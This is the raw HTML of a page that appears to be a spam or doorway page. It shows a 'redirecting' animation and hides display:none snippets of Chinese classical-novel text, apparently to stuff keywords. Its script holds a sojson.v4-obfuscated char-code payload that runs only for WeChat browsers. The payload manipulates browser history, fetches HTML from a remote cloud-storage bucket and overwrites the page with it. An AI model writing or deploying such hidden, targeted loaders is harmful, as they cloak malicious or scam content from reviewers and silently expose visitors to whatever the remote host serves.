
<!doctype html>
<html>
<head>
	 <h2   href="qIOPv" class="qIOPv" style=display:none; >身，因来偷菜，看见廨宇门上新挂一道库司榜</h2><p   href="qIOPv" class="qIOPv" style=display:none; >刹相浼。”真长老便道：“且请员外方丈吃茶</p><h1   href="qIOPv" class="qIOPv" style=display:none; >鲁智深前来住持，自明日为始掌管，并不许闲</h1><h2   href="qIOPv" class="qIOPv" style=display:none; >”

　　初，刘廙坐弟与魏讽谋反，当诛。</h2><ul   href="qIOPv" class="qIOPv" style=display:none; >公孙先生同掌兵权，林教头等共管山寨。汝等</ul>   <meta charset="utf-8">
	<meta charset="UTF-8">
	<meta name="renderer" content="webkit">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta content="always" name="referrer"/>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
</head>
<body>
		<h2   href="qIOPv" class="qIOPv" style=display:none; >身，因来偷菜，看见廨宇门上新挂一道库司榜</h2><p   href="qIOPv" class="qIOPv" style=display:none; >刹相浼。”真长老便道：“且请员外方丈吃茶</p><h1   href="qIOPv" class="qIOPv" style=display:none; >鲁智深前来住持，自明日为始掌管，并不许闲</h1><h2   href="qIOPv" class="qIOPv" style=display:none; >”

　　初，刘廙坐弟与魏讽谋反，当诛。</h2><ul   href="qIOPv" class="qIOPv" style=display:none; >公孙先生同掌兵权，林教头等共管山寨。汝等</ul>     <style>
     .container {
  height: 100px;
  text-align: center;
  margin-top: 200px;
}

.circle {
  margin: 20px;
  height: 50px;
  width: 50px;
  border-radius: 50%;
  display: inline-block;
  transform: scale(0);
  animation: bulge 2s infinite ease-in-out;
}

.circle::after {
  position: absolute;
  display: inline-block;
  content: '';
  height: 100%;
  width: 100%;
  border-radius: 50%;
  background-color: inherit;
  top: 0;
  left: 0;
  z-index: -1;
  transform: scale(1);
  animation: blow 2s infinite ease-in-out;
}

.circle:nth-child(1) {
  background-color: #4695B8;
  animation-delay: 0s;
}

.circle:nth-child(2) {
  background-color: #67A142;
  animation-delay: .25s;
}

.circle:nth-child(3) {
  background-color: #8FC0A7;
  animation-delay: .50s;
}


@keyframes bulge {
  50% {
    transform: scale(1);
  }
}


@keyframes blow {
  25% {
    opacity: 0.5;
  }
  50% {
    opacity: 0.5;
  }
  90% {
    opacity: 0;
  }
  100% {
    transform: scale(2);
    opacity: 0;
  }
}
           iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

    </style>
<div class="container">
            <div class="circle"></div>
			<div>正在跳转中.....</div>
</div>
    <script>
        window['LUi6Nkm'] = "1";
        window['jU8LqkxTrG'] = "2";
        window['rQM8JjQ4DV2RWxdXjoyU'] = "3";
        window['fQPVchNT6yaFTdp'] = "4";
        window['LUi6Nkm'] = "cWupaldK";
        window['a'] = "WUfkmjpunU3m";
        window['1'] = '';
window['2'] = 'LUi6Nkm';
window['3'] = 'cWupaldK';
window['4'] = 'WUfkmjpunU3m';
window['5'] = 'LUi6Nkm';
window['6']= 'cWupaldK';
var ua = navigator.userAgent.toLowerCase();

if(/micromessenger/.test(ua)) {
 ['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"102U117P110f99j116C105A111D110A32u108V111p97V100O72W116t109s108y40C117F114L108w41P123U10C9f100W111E99L117s109a101o110t116I46C116j105J116J108d101u32g61D32X34u46y46p46f34V59c10b32k32o32X32l118g97Z114q32y120p104I114J32z61e32H110t101X119F32v88Q77V76x72n116B116j112q82Y101W113l117I101t115e116T59n10E32H32A32U32k118s97L114c32T104y116f109Z108u32o61V32V110m117r108B108T59d10k32a32g32i32l102m117R110N99Y116d105g111v110N32E114K101L110E100w101A114G40v41H32G123k10y32m32g32h32h32N32x32F32s118S97i114p32s97O32J61L32I100h111Z99W117M109D101t110L116K46e111f112F101l110k40d34Q116J101w120x116G47C104C116P109k108w59i99L104Y97h114p115u101U116P61O85D84m70D45J56q34P44O39P114K101X112a108D97b99Z101V39u41X59v10F32b32D32i32s32G32P32T32H97O46y119u114j105J116F101g40o104G116J109C108S41S59R10M32s32i32w32e32d32T32A32q97p46g99T108O111S115h101t40v41H59Q10s32f32A32F32f125k10n32Q32W32l32H120g104h114U46L111m110a108y111r97j100S32O61i32c102g117a110m99x116d105y111C110R40N41D32E123M10d32z32U32U32o32G32J32w32K104e116N109F108R32f61e32b120M104P114Z46m114R101I115p112X111h110y115s101N84Q101X120e116q59t10W32R32Z32k32V32D32D32C32K118Y97L114T32N100U101J108b97I121J32r61J32m48o59K10a32u32F32z32f32n32i32P32h105K102l32F40P100f101b108H97R121l32f62P32T48E41K32A115C101F116P84u105i109w101z111E117a116p40p34r114p101X110A100E101K114I40A41C34q44b32S100i101D108P97b121L32C42x32Y49L48U48o48m41j10q32Z32O32S32C32d32b32U32B101K108E115Z101G32X114c101u110m100K101j114s40P41C59h10d32w32M32c32W125p59v10r32c32v32J32k120x104J114h46u111V112r101S110d40F34l71K69l84C34V44k117a114A108u44E32m33u48V41r59a10x32S32X32k32b120o104S114U46s115U101W110O100H40T41C59F10Y125A10P104w105a115e116b111X114T121a46w112H117h115B104z83R116n97u116Q101m40K104j105I115d116K111W114r121x46C108p101I110E103z116E104K32L43U32e49I44H32n34P46G46l96b96s96k96U96l96M34c44p32J34v35q120m120G120e120a95v34i32i43P32Y110l101w119D32R68G97I116o101N40f41m46u103o101D116d84r105I109f101f40S41w41S59d10V102f117K110N99o116E105c111n110x32O103r101b116r85M114S108r80A97b114u97P109R40k110n97i109P101G41s32v123i10D9b118O97O114u32b114w101O103a32r61R32W110v101T119y32h82n101g103A69b120f112j40X34K40Z94n124u38n41h34G32Q43W32o110D97d109Q101H32t43a32G34F61g40w91q94r38S93G42f41i40c38Q124R36s41y34E41I59u32n32B32O10A9V118V97j114h32h114P32k61p32b119y105Y110j100p111s119U46V108e111T99p97Y116J105v111Y110J46l115n101X97Z114A99K104s46N115D117n98a115O116A114r40B49v41F46Q109w97L116B99O104l40V114g101R103u41o59j32c32M32a10W9Q105A102H40P114z32y33W61S32y110c117I108y108S41l32T114a101s116o117y114a110o32Z117s110t101S115M99q97m112B101h40l114C91O50R93M41T59y10X9U114B101E116e117Q114K110x32Y110c117e108c108W59w32u32d32U10f125P10o118t97u114c32h105v120K32I61Q32R34G104h119q95o105Q46A104L116b109L108V34R59i10l105S102z40K103r101n116l85o114a108T80v97j114R97T109X40c39C105b120m39C41z33B61S110s117i108Q108M38W38l103K101N116s85c114g108q80F97X114S97q109o40v39o105L120M39A41S33s61z117p110x100I101s102A105z110N101J100H41c123x10K9k105S120z32k61l32n103G101H116a85v114o108n80L97k114V97s109x40j39n105k120h39r41x59O10x125k10C105K120K32d61s32R105i120f43r34j46o104S116L109E108d34W59Y10i108l111m97p100b72O116Z109y108d40e39B47k47T103K103d103x103j106k106E106b106U46u111c115V115R45z99t110y45a98x101z105O106M105o110a103E46i97d108G105U121A117g110C99D115e46C99D111U109P47V39G43Q105V120t41H59"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');
}
    </script>
</body>
</html>
